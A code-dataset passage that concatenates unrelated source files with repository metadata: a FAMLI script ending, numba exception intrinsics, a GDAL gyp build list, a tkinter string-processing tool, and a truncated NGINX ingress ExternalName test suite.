SSTART_i=args.sstart_ix,
SEND_i=args.send_ix,
BITSCORE_i=args.bitscore_ix,
SLEN_i=args.slen_ix,
SD_MEAN_CUTOFF=args.sd_mean_cutoff,
STRIM_5=args.strim_5,
STRIM_3=args.strim_3,
threads=args.threads,
batchsize=args.batchsize,
)
f.close()
if args.output:
with open(args.output, "wt") as fo:
json.dump(output, fo, indent=4)
elapsed = round(time.time() - start_time, 2)
logging.info("Time elapsed: {:,}".format(elapsed))
def main():
"""Entrypoint for main script."""
FAMLI()
if __name__ == "__main__":
# Run FAMLI
FAMLI()
| 38.531807
| 95
| 0.517929
|
0a488a211b9e9f8e712cdf4b58f9a18bce9b0e52
| 1,611
|
py
|
Python
|
dev/Gems/CloudGemMetric/v1/AWS/python/windows/Lib/numba/unsafe/eh.py
|
BadDevCode/lumberyard
|
3d688932f919dbf5821f0cb8a210ce24abe39e9e
|
[
"AML"
] | 1,738
|
2017-09-21T10:59:12.000Z
|
2022-03-31T21:05:46.000Z
|
dev/Gems/CloudGemMetric/v1/AWS/python/windows/Lib/numba/unsafe/eh.py
|
olivier-be/lumberyard
|
3d688932f919dbf5821f0cb8a210ce24abe39e9e
|
[
"AML"
] | 427
|
2017-09-29T22:54:36.000Z
|
2022-02-15T19:26:50.000Z
|
dev/Gems/CloudGemMetric/v1/AWS/python/windows/Lib/numba/unsafe/eh.py
|
olivier-be/lumberyard
|
3d688932f919dbf5821f0cb8a210ce24abe39e9e
|
[
"AML"
] | 671
|
2017-09-21T08:04:01.000Z
|
2022-03-29T14:30:07.000Z
|
"""
Exception handling intrinsics.
"""
from numba import types, cgutils, errors
from numba.extending import intrinsic
@intrinsic
def exception_check(typingctx):
"""An intrinsic to check if an exception is raised
"""
def codegen(context, builder, signature, args):
nrt = context.nrt
return nrt.eh_check(builder)
restype = types.boolean
return restype(), codegen
@intrinsic
def mark_try_block(typingctx):
"""An intrinsic to mark the start of a *try* block.
"""
def codegen(context, builder, signature, args):
nrt = context.nrt
nrt.eh_try(builder)
return context.get_dummy_value()
restype = types.none
return restype(), codegen
@intrinsic
def end_try_block(typingctx):
"""An intrinsic to mark the end of a *try* block.
"""
def codegen(context, builder, signature, args):
nrt = context.nrt
nrt.eh_end_try(builder)
return context.get_dummy_value()
restype = types.none
return restype(), codegen
@intrinsic
def exception_match(typingctx, exc_value, exc_class):
"""Basically do ``isinstance(exc_value, exc_class)`` for exception objects.
Used in ``except Exception:`` syntax.
"""
# Check for our limitation
if exc_class.exc_class is not Exception:
msg = "Exception matching is limited to {}"
raise errors.UnsupportedError(msg.format(Exception))
def codegen(context, builder, signature, args):
# Intentionally always True.
return cgutils.true_bit
restype = types.boolean
return restype(exc_value, exc_class), codegen
| 25.571429
| 79
| 0.67784
|
b2addcce044962484ce677134950ac4027085fb2
| 12,587
|
gyp
|
Python
|
deps/libgdal/libgdal.gyp
|
seraph144/node-gdal
|
c6987705ced2b4eba8be123ececa40be80e56694
|
[
"Apache-2.0"
] | null | null | null |
deps/libgdal/libgdal.gyp
|
seraph144/node-gdal
|
c6987705ced2b4eba8be123ececa40be80e56694
|
[
"Apache-2.0"
] | null | null | null |
deps/libgdal/libgdal.gyp
|
seraph144/node-gdal
|
c6987705ced2b4eba8be123ececa40be80e56694
|
[
"Apache-2.0"
] | null | null | null |
{
"includes": [
"./common.gypi",
"./libgdal_formats.gypi"
],
"targets": [
{
"target_name": "libgdal",
"type": "static_library",
"sources": [
"gdal/apps/gdal_translate_lib.cpp",
"gdal/apps/ogr2ogr_lib.cpp",
"gdal/apps/gdalbuildvrt_lib.cpp",
"gdal/apps/commonutils.cpp",
"gdal/frmts/gdalallregister.cpp",
"gdal/ogr/osr_cs_wkt.c",
"gdal/ogr/osr_cs_wkt_parser.c",
"gdal/ogr/gml2ogrgeometry.cpp",
"gdal/ogr/ogr2gmlgeometry.cpp",
"gdal/ogr/ogr_api.cpp",
"gdal/ogr/ogr_expat.cpp",
"gdal/ogr/ogr_fromepsg.cpp",
"gdal/ogr/ogr_geocoding.cpp",
"gdal/ogr/ogr_opt.cpp",
"gdal/ogr/ogr_srs_dict.cpp",
"gdal/ogr/ogr_srs_erm.cpp",
"gdal/ogr/ogr_srs_esri.cpp",
"gdal/ogr/ogr_srs_ozi.cpp",
"gdal/ogr/ogr_srs_panorama.cpp",
"gdal/ogr/ogr_srs_pci.cpp",
"gdal/ogr/ogr_srs_proj4.cpp",
"gdal/ogr/ogr_srs_usgs.cpp",
"gdal/ogr/ogr_srs_validate.cpp",
"gdal/ogr/ogr_srs_xml.cpp",
"gdal/ogr/ogr_srsnode.cpp",
"gdal/ogr/ograssemblepolygon.cpp",
"gdal/ogr/ogrct.cpp",
"gdal/ogr/ogrcurve.cpp",
"gdal/ogr/ogrfeature.cpp",
"gdal/ogr/ogrfeaturedefn.cpp",
"gdal/ogr/ogrfeaturequery.cpp",
"gdal/ogr/ogrfeaturestyle.cpp",
"gdal/ogr/ogrfielddefn.cpp",
"gdal/ogr/ogrgeomediageometry.cpp",
"gdal/ogr/ogrgeometry.cpp",
"gdal/ogr/ogrgeometrycollection.cpp",
"gdal/ogr/ogrgeometryfactory.cpp",
"gdal/ogr/ogrgeomfielddefn.cpp",
"gdal/ogr/ogrlinearring.cpp",
"gdal/ogr/ogrlinestring.cpp",
"gdal/ogr/ogrmultilinestring.cpp",
"gdal/ogr/ogrmultipoint.cpp",
"gdal/ogr/ogrmultipolygon.cpp",
"gdal/ogr/ogrpgeogeometry.cpp",
"gdal/ogr/ogrpoint.cpp",
"gdal/ogr/ogrpolygon.cpp",
"gdal/ogr/ogrspatialreference.cpp",
"gdal/ogr/ogrsurface.cpp",
"gdal/ogr/ogrutils.cpp",
"gdal/ogr/swq.cpp",
"gdal/ogr/swq_expr_node.cpp",
"gdal/ogr/swq_op_general.cpp",
"gdal/ogr/swq_op_registrar.cpp",
"gdal/ogr/swq_parser.cpp",
"gdal/ogr/swq_select.cpp",
"gdal/ogr/ograpispy.cpp",
"gdal/ogr/ogrcircularstring.cpp",
"gdal/ogr/ogrcompoundcurve.cpp",
"gdal/ogr/ogrcurvecollection.cpp",
"gdal/ogr/ogrcurvepolygon.cpp",
"gdal/ogr/ogrmulticurve.cpp",
"gdal/ogr/ogrmultisurface.cpp",
"gdal/ogr/ogr_geo_utils.cpp",
"gdal/ogr/ogr_xerces.cpp",
"gdal/ogr/ogrpolyhedralsurface.cpp",
"gdal/ogr/ogrtriangle.cpp",
"gdal/ogr/ogrtriangulatedsurface.cpp",
"gdal/ogr/ogrsf_frmts/generic/ogreditablelayer.cpp",
"gdal/ogr/ogrsf_frmts/generic/ogremulatedtransaction.cpp",
"gdal/ogr/ogrsf_frmts/generic/ogr_attrind.cpp",
"gdal/ogr/ogrsf_frmts/generic/ogr_gensql.cpp",
"gdal/ogr/ogrsf_frmts/generic/ogr_miattrind.cpp",
"gdal/ogr/ogrsf_frmts/generic/ogrdatasource.cpp",
"gdal/ogr/ogrsf_frmts/generic/ogrlayer.cpp",
"gdal/ogr/ogrsf_frmts/generic/ogrlayerdecorator.cpp",
"gdal/ogr/ogrsf_frmts/generic/ogrlayerpool.cpp",
"gdal/ogr/ogrsf_frmts/generic/ogrmutexeddatasource.cpp",
"gdal/ogr/ogrsf_frmts/generic/ogrmutexedlayer.cpp",
"gdal/ogr/ogrsf_frmts/generic/ogrregisterall.cpp",
"gdal/ogr/ogrsf_frmts/generic/ogrsfdriver.cpp",
"gdal/ogr/ogrsf_frmts/generic/ogrsfdriverregistrar.cpp",
"gdal/ogr/ogrsf_frmts/generic/ogrunionlayer.cpp",
"gdal/ogr/ogrsf_frmts/generic/ogrwarpedlayer.cpp",
"gdal/alg/gdalpansharpen.cpp",
"gdal/alg/delaunay.c",
"gdal/alg/contour.cpp",
"gdal/alg/polygonize.cpp",
"gdal/alg/gdal_octave.cpp",
"gdal/alg/gdal_rpc.cpp",
"gdal/alg/gdal_simplesurf.cpp",
"gdal/alg/gdal_tps.cpp",
"gdal/alg/gdalchecksum.cpp",
"gdal/alg/gdalcutline.cpp",
"gdal/alg/gdaldither.cpp",
"gdal/alg/gdalgeoloc.cpp",
"gdal/alg/gdalgrid.cpp",
"gdal/alg/gdalgridsse.cpp",
"gdal/alg/gdalgridavx.cpp",
"gdal/alg/gdalmatching.cpp",
"gdal/alg/gdalmediancut.cpp",
"gdal/alg/gdalproximity.cpp",
"gdal/alg/gdalrasterize.cpp",
"gdal/alg/gdalrasterpolygonenumerator.cpp",
"gdal/alg/gdalsievefilter.cpp",
"gdal/alg/gdalsimplewarp.cpp",
"gdal/alg/gdaltransformer.cpp",
"gdal/alg/gdaltransformgeolocs.cpp",
"gdal/alg/gdalwarper.cpp",
"gdal/alg/gdalwarpkernel.cpp",
"gdal/alg/gdalwarpoperation.cpp",
"gdal/alg/llrasterize.cpp",
"gdal/alg/polygonize.cpp",
"gdal/alg/rasterfill.cpp",
"gdal/alg/thinplatespline.cpp",
"gdal/alg/gdal_crs.c",
# "gdal/alg/gdal_nrgcrs.c",
"gdal/alg/gdalwarpkernel_opencl.cpp",
"gdal/alg/gdalapplyverticalshiftgrid.cpp",
"gdal/alg/gdallinearsystem.cpp",
"gdal/gcore/gdal_misc.cpp",
"gdal/gcore/gdal_rat.cpp",
"gdal/gcore/gdal_mdreader.cpp",
"gdal/gcore/gdalallvalidmaskband.cpp",
"gdal/gcore/gdalclientserver.cpp",
"gdal/gcore/gdalcolortable.cpp",
"gdal/gcore/gdaldataset.cpp",
"gdal/gcore/gdaldefaultasync.cpp",
"gdal/gcore/gdaldefaultoverviews.cpp",
"gdal/gcore/gdaldllmain.cpp",
"gdal/gcore/gdaldriver.cpp",
"gdal/gcore/gdaldrivermanager.cpp",
"gdal/gcore/gdalexif.cpp",
"gdal/gcore/gdalgeorefpamdataset.cpp",
"gdal/gcore/gdaljp2abstractdataset.cpp",
"gdal/gcore/gdaljp2box.cpp",
"gdal/gcore/gdaljp2structure.cpp",
"gdal/gcore/gdaljp2metadata.cpp",
"gdal/gcore/gdaljp2metadatagenerator.cpp",
"gdal/gcore/gdalmajorobject.cpp",
"gdal/gcore/gdalmultidomainmetadata.cpp",
"gdal/gcore/gdalnodatamaskband.cpp",
"gdal/gcore/gdalnodatavaluesmaskband.cpp",
"gdal/gcore/gdalopeninfo.cpp",
"gdal/gcore/gdalpamdataset.cpp",
"gdal/gcore/gdalpamproxydb.cpp",
"gdal/gcore/gdalpamrasterband.cpp",
"gdal/gcore/gdalproxydataset.cpp",
"gdal/gcore/gdalproxypool.cpp",
"gdal/gcore/gdalrasterband.cpp",
"gdal/gcore/gdalrasterblock.cpp",
"gdal/gcore/gdalabstractbandblockcache.cpp",
"gdal/gcore/gdalarraybandblockcache.cpp",
"gdal/gcore/gdalhashsetbandblockcache.cpp",
"gdal/gcore/gdalrescaledalphaband.cpp",
"gdal/gcore/gdalvirtualmem.cpp",
"gdal/gcore/overview.cpp",
"gdal/gcore/rasterio.cpp",
"gdal/gcore/rasterio_ssse3.cpp",
"gdal/gcore/gdaloverviewdataset.cpp",
"gdal/gcore/mdreader/reader_alos.cpp",
"gdal/gcore/mdreader/reader_digital_globe.cpp",
"gdal/gcore/mdreader/reader_eros.cpp",
"gdal/gcore/mdreader/reader_geo_eye.cpp",
"gdal/gcore/mdreader/reader_kompsat.cpp",
"gdal/gcore/mdreader/reader_landsat.cpp",
"gdal/gcore/mdreader/reader_orb_view.cpp",
"gdal/gcore/mdreader/reader_pleiades.cpp",
"gdal/gcore/mdreader/reader_rapid_eye.cpp",
"gdal/gcore/mdreader/reader_rdk1.cpp",
"gdal/gcore/mdreader/reader_spot.cpp",
# "gdal/port/cpl_win32ce_api.cpp",
# "gdal/port/vsipreload.cpp",
"gdal/port/cpl_worker_thread_pool.cpp",
"gdal/port/cpl_atomic_ops.cpp",
"gdal/port/cpl_base64.cpp",
"gdal/port/cpl_conv.cpp",
"gdal/port/cpl_csv.cpp",
"gdal/port/cpl_error.cpp",
"gdal/port/cpl_findfile.cpp",
"gdal/port/cpl_getexecpath.cpp",
"gdal/port/cpl_google_oauth2.cpp",
"gdal/port/cpl_hash_set.cpp",
"gdal/port/cpl_http.cpp",
"gdal/port/cpl_list.cpp",
"gdal/port/cpl_minixml.cpp",
"gdal/port/cpl_minizip_ioapi.cpp",
"gdal/port/cpl_minizip_unzip.cpp",
"gdal/port/cpl_minizip_zip.cpp",
"gdal/port/cpl_multiproc.cpp",
"gdal/port/cpl_path.cpp",
"gdal/port/cpl_progress.cpp",
"gdal/port/cpl_quad_tree.cpp",
"gdal/port/cpl_recode.cpp",
"gdal/port/cpl_recode_iconv.cpp",
"gdal/port/cpl_recode_stub.cpp",
"gdal/port/cpl_spawn.cpp",
"gdal/port/cpl_string.cpp",
"gdal/port/cpl_strtod.cpp",
"gdal/port/cpl_time.cpp",
"gdal/port/cpl_virtualmem.cpp",
"gdal/port/cpl_vsi_mem.cpp",
"gdal/port/cpl_vsi_error.cpp",
"gdal/port/cpl_vsil.cpp",
"gdal/port/cpl_vsil_crypt.cpp",
"gdal/port/cpl_vsil_abstract_archive.cpp",
"gdal/port/cpl_vsil_buffered_reader.cpp",
"gdal/port/cpl_vsil_cache.cpp",
"gdal/port/cpl_vsil_curl.cpp",
"gdal/port/cpl_vsil_curl_streaming.cpp",
"gdal/port/cpl_vsil_gzip.cpp",
# "gdal/port/cpl_vsil_simple.cpp",
"gdal/port/cpl_vsil_sparsefile.cpp",
"gdal/port/cpl_vsil_stdin.cpp",
"gdal/port/cpl_vsil_stdout.cpp",
"gdal/port/cpl_vsil_subfile.cpp",
"gdal/port/cpl_vsil_tar.cpp",
"gdal/port/cpl_vsil_unix_stdio_64.cpp",
"gdal/port/cpl_vsil_win32.cpp",
"gdal/port/cpl_vsil_az.cpp",
"gdal/port/cpl_vsil_gs.cpp",
"gdal/port/cpl_vsil_hdfs.cpp",
"gdal/port/cpl_vsil_oss.cpp",
"gdal/port/cpl_vsil_s3.cpp",
"gdal/port/cpl_vsil_swift.cpp",
"gdal/port/cpl_vsisimple.cpp",
"gdal/port/cpl_xml_validate.cpp",
"gdal/port/cpl_alibaba_oss.cpp",
"gdal/port/cpl_azure.cpp",
"gdal/port/cpl_cpu_features.cpp",
"gdal/port/cpl_google_cloud.cpp",
"gdal/port/cpl_json.cpp",
"gdal/port/cpl_json_streaming_parser.cpp",
"gdal/port/cpl_md5.cpp",
"gdal/port/cpl_sha1.cpp",
"gdal/port/cpl_sha256.cpp",
"gdal/port/cpl_swift.cpp",
"gdal/port/cpl_userfaultfd.cpp",
"gdal/port/cplgetsymbol.cpp",
"gdal/port/cplkeywordparser.cpp",
"gdal/port/cplstring.cpp",
"gdal/port/cplstringlist.cpp",
"gdal/port/xmlreformat.cpp",
"gdal/frmts/jpeg/libjpeg/jcapimin.c",
"gdal/frmts/jpeg/libjpeg/jcapistd.c",
"gdal/frmts/jpeg/libjpeg/jccoefct.c",
"gdal/frmts/jpeg/libjpeg/jccolor.c",
"gdal/frmts/jpeg/libjpeg/jcdctmgr.c",
"gdal/frmts/jpeg/libjpeg/jchuff.c",
"gdal/frmts/jpeg/libjpeg/jcinit.c",
"gdal/frmts/jpeg/libjpeg/jcmainct.c",
"gdal/frmts/jpeg/libjpeg/jcmarker.c",
"gdal/frmts/jpeg/libjpeg/jcmaster.c",
"gdal/frmts/jpeg/libjpeg/jcomapi.c",
"gdal/frmts/jpeg/libjpeg/jcparam.c",
"gdal/frmts/jpeg/libjpeg/jcphuff.c",
"gdal/frmts/jpeg/libjpeg/jcprepct.c",
"gdal/frmts/jpeg/libjpeg/jcsample.c",
"gdal/frmts/jpeg/libjpeg/jctrans.c",
"gdal/frmts/jpeg/libjpeg/jdapimin.c",
"gdal/frmts/jpeg/libjpeg/jdapistd.c",
"gdal/frmts/jpeg/libjpeg/jdatadst.c",
"gdal/frmts/jpeg/libjpeg/jdatasrc.c",
"gdal/frmts/jpeg/libjpeg/jdcoefct.c",
"gdal/frmts/jpeg/libjpeg/jdcolor.c",
"gdal/frmts/jpeg/libjpeg/jddctmgr.c",
"gdal/frmts/jpeg/libjpeg/jdhuff.c",
"gdal/frmts/jpeg/libjpeg/jdinput.c",
"gdal/frmts/jpeg/libjpeg/jdmainct.c",
"gdal/frmts/jpeg/libjpeg/jdmarker.c",
"gdal/frmts/jpeg/libjpeg/jdmaster.c",
"gdal/frmts/jpeg/libjpeg/jdmerge.c",
"gdal/frmts/jpeg/libjpeg/jdphuff.c",
"gdal/frmts/jpeg/libjpeg/jdpostct.c",
"gdal/frmts/jpeg/libjpeg/jdsample.c",
"gdal/frmts/jpeg/libjpeg/jdtrans.c",
"gdal/frmts/jpeg/libjpeg/jerror.c",
"gdal/frmts/jpeg/libjpeg/jfdctflt.c",
"gdal/frmts/jpeg/libjpeg/jfdctfst.c",
"gdal/frmts/jpeg/libjpeg/jfdctint.c",
"gdal/frmts/jpeg/libjpeg/jidctflt.c",
"gdal/frmts/jpeg/libjpeg/jidctfst.c",
"gdal/frmts/jpeg/libjpeg/jidctint.c",
"gdal/frmts/jpeg/libjpeg/jidctred.c",
"gdal/frmts/jpeg/libjpeg/jmemansi.c",
"gdal/frmts/jpeg/libjpeg/jmemmgr.c",
"gdal/frmts/jpeg/libjpeg/jquant1.c",
"gdal/frmts/jpeg/libjpeg/jquant2.c",
"gdal/frmts/jpeg/libjpeg/jutils.c",
"gdal/third_party/LercLib/BitMask.cpp",
"gdal/third_party/LercLib/BitStuffer2.cpp",
"gdal/third_party/LercLib/Huffman.cpp",
"gdal/third_party/LercLib/Lerc.cpp",
"gdal/third_party/LercLib/Lerc2.cpp",
"gdal/third_party/LercLib/Lerc_c_api_impl.cpp",
"gdal/third_party/LercLib/RLE.cpp"
],
"include_dirs": [
"./gdal/alg",
"./gdal/alg/marching_squares",
"./gdal/apps",
"./gdal/gcore",
"./gdal/port",
"./gdal/frmts",
"./gdal/frmts/zlib",
"./gdal/frmts/vrt",
"./gdal/frmts/mem",
"./gdal/ogr",
"./gdal/ogr/ogrsf_frmts",
"./gdal/ogr/ogrsf_frmts/mem",
"./gdal/ogr/ogrsf_frmts/geojson",
"./gdal/frmts/jpeg/libjpeg"
],
"dependencies": [
'<@(gdal_format_gyps)'
],
"defines": [
'<@(gdal_format_defs)'
],
"conditions": [
["OS == 'win'", {
"sources": [
"gdal/port/cpl_odbc.cpp"
],
"link_settings": {
"libraries": [
"-lws2_32.lib",
"-lodbccp32.lib"
]
}
}]
],
"direct_dependent_settings": {
"include_dirs": [
"./gdal/alg",
"./gdal/apps",
"./gdal/gcore",
"./gdal/port",
"./gdal/ogr",
"./gdal/ogr/ogrsf_frmts"
],
"conditions": [
["OS == 'win'", {
"include_dirs": ["./arch/win"]
}, {
"include_dirs": ["./arch/unix"]
}],
[ "OS == 'mac'", {
"libraries": [
"-liconv"
]
}]
],
"defines": [
"_LARGEFILE_SOURCE",
"_FILE_OFFSET_BITS=64"
]
}
}
]
}
| 33.476064
| 62
| 0.671486
|
a44d3ad2edf4f992e2f1918ad4f14d9cb424d432
| 6,917
|
py
|
Python
|
main.py
|
Georege/python_strings_handler
|
3211bab8ea7123be4167d61b372c0df3605f93d0
|
[
"MIT"
] | null | null | null |
main.py
|
Georege/python_strings_handler
|
3211bab8ea7123be4167d61b372c0df3605f93d0
|
[
"MIT"
] | null | null | null |
main.py
|
Georege/python_strings_handler
|
3211bab8ea7123be4167d61b372c0df3605f93d0
|
[
"MIT"
] | null | null | null |
import base64
from tkinter import *
from tkinter import messagebox
from urllib.parse import urlencode, parse_qs, parse_qsl
import json
# 查看字符串长度
def getlen():
source = source_input.get('0.0', 'end-1c')
if source:
output = len(source)
# print('output type is :{}'.format(type(output)))
target_output.config(state='normal')
target_output.delete("1.0", 'end')
target_output.insert('end', '长度为{}位'.format(output))
target_output.config(state='disabled')
else:
messagebox.showinfo(
'系统提示:', "输入框不能为空")
# 去重
def quchong():
source = source_input.get('0.0', 'end-1c')
if source:
# print('source type is :{}'.format(type(source)))
input_list = source.split('\n')
# print('input_list type is :{}'.format(type(input_list)))
output = '\n'.join([x for x in set(input_list) if x])
# print('output type is :{}'.format(type(output)))
target_output.config(state='normal')
target_output.delete("1.0", 'end')
target_output.insert('end', '{}'.format(output))
target_output.config(state='disabled')
else:
messagebox.showinfo(
'系统提示:', "输入框不能为空")
# 逗号拼接
def pinjie():
source = source_input.get('0.0', 'end-1c')
if source:
# print('source type is :{}'.format(type(source)))
input_list = source.split('\n')
# print('input_list type is :{}'.format(type(input_list)))
output = ','.join([x for x in input_list if x])
# print('output type is :{}'.format(type(output)))
target_output.config(state='normal')
target_output.delete("1.0", 'end')
target_output.insert('end', '{}'.format(output))
target_output.config(state='disabled')
else:
messagebox.showinfo(
'系统提示:', "输入框不能为空")
# &转换行
def convert_n():
source = source_input.get('0.0', 'end-1c')
if source:
# print('source type is :{}'.format(type(source)))
input_list = source.split('&')
# print('input_list type is :{}'.format(type(input_list)))
output = '\n'.join([x for x in input_list if x])
# print('output type is :{}'.format(type(output)))
target_output.config(state='normal')
target_output.delete("1.0", 'end')
target_output.insert('end', '{}'.format(output))
target_output.config(state='disabled')
else:
messagebox.showinfo(
'系统提示:', "输入框不能为空")
# @转换行
def convert_i():
source = source_input.get('0.0', 'end-1c')
if source:
# print('source type is :{}'.format(type(source)))
input_list = source.split('@')
# print('input_list type is :{}'.format(type(input_list)))
output = '\n'.join([x for x in input_list if x])
# print('output type is :{}'.format(type(output)))
target_output.config(state='normal')
target_output.delete("1.0", 'end')
target_output.insert('end', '{}'.format(output))
target_output.config(state='disabled')
else:
messagebox.showinfo(
'系统提示:', "输入框不能为空")
# 转义斜杠为短横
def convert():
source = source_input.get('0.0', 'end-1c')
if source:
# print('source type is :{}'.format(type(source)))
input_list = source.split('/')
# print('input_list type is :{}'.format(type(input_list)))
output = '-'.join([x for x in input_list if x])
# print('output type is :{}'.format(type(output)))
target_output.config(state='normal')
target_output.delete("1.0", 'end')
target_output.insert('end', '{}'.format(output))
target_output.config(state='disabled')
else:
messagebox.showinfo(
'系统提示:', "输入框不能为空")
# 转义字典为params,将存入的字典参数编码为URL查询字符串,即转换成以key1=value1&key2=value2的形式
def convert_params():
source = source_input.get('0.0', 'end-1c')
if source:
# print('source type is :{}'.format(type(source)))
output = urlencode(json.loads(source))
# print('output type is :{}'.format(type(output)))
target_output.config(state='normal')
target_output.delete("1.0", 'end')
target_output.insert('end', '{}'.format(output))
target_output.config(state='disabled')
else:
messagebox.showinfo(
'系统提示:', "输入框不能为空")
# 转义params为字典
def convert_dict():
source = source_input.get('0.0', 'end-1c')
if source:
# print('source type is :{}'.format(type(source)))
out_dict = parse_qs(source)
output = json.dumps(
{key: value[0] for key, value in out_dict.items()}, indent=4, ensure_ascii=False)
# print('output type is :{}'.format(type(output)))
target_output.config(state='normal')
target_output.delete("1.0", 'end')
target_output.insert('end', '{}'.format(output))
target_output.config(state='disabled')
else:
messagebox.showinfo(
'系统提示:', "输入框不能为空")
# 复制
def copy():
output = target_output.get('0.0', 'end-1c')
if output:
root.clipboard_clear()
root.clipboard_append(output)
root.update()
messagebox.showinfo('系统提示:', '{}\n复制成功'.format(output))
else:
messagebox.showinfo(
'系统提示:', "输入框不能为空")
if __name__ == "__main__":
input_out_width = 130
input_out_height = 20
root = Tk()
root.title("字符串处理")
root.resizable(width=False, height=False)
# line 1
Label(root, text="请输入需要处理的字符串:").grid(
row=1, column=1)
source_input = Text(root, width=input_out_width, height=input_out_height)
source_input.grid(
row=1, column=2, rowspan=2)
# button
Button(root, text="获取长度", command=lambda: getlen()).grid(
row=1, column=3, padx=10)
Button(root, text="列去重", command=lambda: quchong()).grid(
row=1, column=4, padx=10)
Button(root, text="逗号拼接", command=lambda: pinjie()).grid(
row=1, column=5, padx=10)
Button(root, text="转义斜杠", command=lambda: convert()).grid(
row=2, column=3, padx=10)
Button(root, text="转义&为换行", command=lambda: convert_n()).grid(
row=2, column=4, padx=10)
Button(root, text="转义@为换行", command=lambda: convert_i()).grid(
row=2, column=5, padx=10)
Button(root, text="转义字典为params", command=lambda: convert_params()).grid(
row=3, column=3, padx=10)
Button(root, text="转义params为字典", command=lambda: convert_dict()).grid(
row=3, column=4, padx=10)
# Button(root, text="转义@为换行", command=lambda: convert_i()).grid(
# row=3, column=5, padx=10)
# line 2
Label(root, text="处理后的结果是:").grid(
row=3, column=1)
target_output = Text(root, width=input_out_width, height=input_out_height)
target_output.grid(
row=3, column=2, rowspan=2)
# button
Button(root, text="复制", command=lambda: copy()).grid(
row=4, column=3)
root.mainloop()
| 33.095694
| 93
| 0.595345
|
38f4c85dbf406604a5b60fbfd8f56cb7a54d4db6
| 6,962
|
py
|
Python
|
tests/suite/test_externalname_service.py
|
snebel29/kubernetes-ingress
|
a31cd87288fa102ef9f094da7ecd371e9b36c680
|
[
"Apache-2.0"
] | 1
|
2021-11-07T18:54:51.000Z
|
2021-11-07T18:54:51.000Z
|
tests/suite/test_externalname_service.py
|
snebel29/kubernetes-ingress
|
a31cd87288fa102ef9f094da7ecd371e9b36c680
|
[
"Apache-2.0"
] | 123
|
2021-09-06T19:21:23.000Z
|
2022-03-31T05:22:42.000Z
|
tests/suite/test_externalname_service.py
|
snebel29/kubernetes-ingress
|
a31cd87288fa102ef9f094da7ecd371e9b36c680
|
[
"Apache-2.0"
] | null | null | null |
import requests
import pytest
from settings import TEST_DATA
from suite.fixtures import PublicEndpoint
from suite.resources_utils import create_ingress_from_yaml, create_service_with_name, \
create_namespace_with_name_from_yaml, create_deployment_with_name, delete_namespace, ensure_response_from_backend
from suite.resources_utils import replace_configmap_from_yaml, create_service_from_yaml
from suite.resources_utils import replace_configmap, delete_ingress, delete_service, get_ingress_nginx_template_conf
from suite.resources_utils import get_first_pod_name, ensure_connection_to_public_endpoint, wait_before_test
from suite.yaml_utils import get_first_ingress_host_from_yaml
class ExternalNameSetup:
"""Encapsulate ExternalName example details.
Attributes:
public_endpoint: PublicEndpoint
ingress_name:
ingress_pod_name:
ingress_host:
service: external-name example service name
external_host: external-name example external host
namespace: external-name example namespace
"""
def __init__(self, public_endpoint: PublicEndpoint,
ingress_name, ingress_host, ingress_pod_name, service, external_host, namespace):
self.public_endpoint = public_endpoint
self.ingress_name = ingress_name
self.ingress_pod_name = ingress_pod_name
self.namespace = namespace
self.ingress_host = ingress_host
self.service = service
self.external_host = external_host
@pytest.fixture(scope="class")
def external_name_setup(request,
kube_apis,
ingress_controller_prerequisites,
ingress_controller_endpoint, ingress_controller, test_namespace) -> ExternalNameSetup:
print("------------------------- Deploy External-Backend -----------------------------------")
external_ns = create_namespace_with_name_from_yaml(kube_apis.v1, "external-ns", f"{TEST_DATA}/common/ns.yaml")
external_svc_name = create_service_with_name(kube_apis.v1, external_ns, "external-backend-svc")
create_deployment_with_name(kube_apis.apps_v1_api, external_ns, "external-backend")
print("------------------------- Deploy External-Name-Example -----------------------------------")
ingress_name = create_ingress_from_yaml(kube_apis.networking_v1, test_namespace,
f"{TEST_DATA}/externalname-services/externalname-ingress.yaml")
ingress_host = get_first_ingress_host_from_yaml(f"{TEST_DATA}/externalname-services/externalname-ingress.yaml")
external_host = f"{external_svc_name}.{external_ns}.svc.cluster.local"
config_map_name = ingress_controller_prerequisites.config_map["metadata"]["name"]
replace_configmap_from_yaml(kube_apis.v1, config_map_name,
ingress_controller_prerequisites.namespace,
f"{TEST_DATA}/externalname-services/nginx-config.yaml")
svc_name = create_service_from_yaml(kube_apis.v1,
test_namespace, f"{TEST_DATA}/externalname-services/externalname-svc.yaml")
ensure_connection_to_public_endpoint(ingress_controller_endpoint.public_ip,
ingress_controller_endpoint.port,
ingress_controller_endpoint.port_ssl)
ic_pod_name = get_first_pod_name(kube_apis.v1, ingress_controller_prerequisites.namespace)
def fin():
print("Clean up External-Name-Example:")
delete_namespace(kube_apis.v1, external_ns)
replace_configmap(kube_apis.v1, config_map_name,
ingress_controller_prerequisites.namespace,
ingress_controller_prerequisites.config_map)
delete_ingress(kube_apis.networking_v1, ingress_name, test_namespace)
delete_service(kube_apis.v1, svc_name, test_namespace)
request.addfinalizer(fin)
return ExternalNameSetup(ingress_controller_endpoint,
ingress_name, ingress_host, ic_pod_name, svc_name, external_host, test_namespace)
@pytest.mark.ingresses
@pytest.mark.skip_for_nginx_oss
class TestExternalNameService:
def test_resolver(self, external_name_setup):
wait_before_test()
req_url = f"http://{external_name_setup.public_endpoint.public_ip}:{external_name_setup.public_endpoint.port}/"
ensure_response_from_backend(req_url, external_name_setup.ingress_host)
resp = requests.get(req_url, headers={"host": external_name_setup.ingress_host}, verify=False)
assert resp.status_code == 200
def test_ic_template_config_upstream_zone(self, kube_apis, ingress_controller_prerequisites,
ingress_controller, external_name_setup):
result_conf = get_ingress_nginx_template_conf(kube_apis.v1,
external_name_setup.namespace,
external_name_setup.ingress_name,
external_name_setup.ingress_pod_name,
ingress_controller_prerequisites.namespace)
line = f"zone {external_name_setup.namespace}-" \
f"{external_name_setup.ingress_name}-" \
f"{external_name_setup.ingress_host}-{external_name_setup.service}-80 256k;"
assert line in result_conf
def test_ic_template_config_upstream_rule(self, kube_apis, ingress_controller_prerequisites,
ingress_controller, external_name_setup):
result_conf = get_ingress_nginx_template_conf(kube_apis.v1,
external_name_setup.namespace,
external_name_setup.ingress_name,
external_name_setup.ingress_pod_name,
ingress_controller_prerequisites.namespace)
assert "random two least_conn;" in result_conf
def test_ic_template_config_upstream_server(self, kube_apis, ingress_controller_prerequisites,
ingress_controller, ingress_controller_endpoint, external_name_setup):
result_conf = get_ingress_nginx_template_conf(kube_apis.v1,
external_name_setup.namespace,
external_name_setup.ingress_name,
external_name_setup.ingress_pod_name,
ingress_controller_prerequisites.namespace)
